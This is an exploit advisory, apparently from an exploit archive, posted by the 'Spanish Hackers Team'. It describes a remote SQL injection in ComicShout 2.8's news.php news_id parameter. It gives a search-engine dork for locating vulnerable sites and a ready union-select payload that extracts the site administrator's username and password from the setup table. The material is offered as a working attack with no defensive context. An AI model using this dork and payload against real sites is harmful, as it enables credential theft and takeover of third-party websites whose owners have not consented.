|
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--=0D
--==+ ComicShout 2.8 (news.php news_id) Remote SQL Injection Vulnerability +==--=0D
--==+====================================================================================+==--=0D
- dreaming of necessity is reason to comply -=0D
=0D
[+] Info:=0D
=0D
[~] Bug found by JosS=0D
[~] sys-project[at]hotmail.com=0D
[~] http://www.spanish-hackers.com=0D
[~] EspSeC & Hack0wn!.=0D
=0D
=0D
[~] Software: ComicShout 2.8=0D
[~] Exploit: Remote SQL Injection [High]=0D
[~] Vuln file: news.php=0D
=0D
[~] Dork: "Powered by ComicShout"=0D
=0D
[+] Exploit:=0D
=0D
[~] /news.php?news_id=[SQL]=0D
[~] 4+union+all+select+0,1,site_admin,site_pass+from+setup/*=0D
=0D
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--=0D
--==+ JosS +==--=0D
--==+====================================================================================+==--=0D
[+] [The End]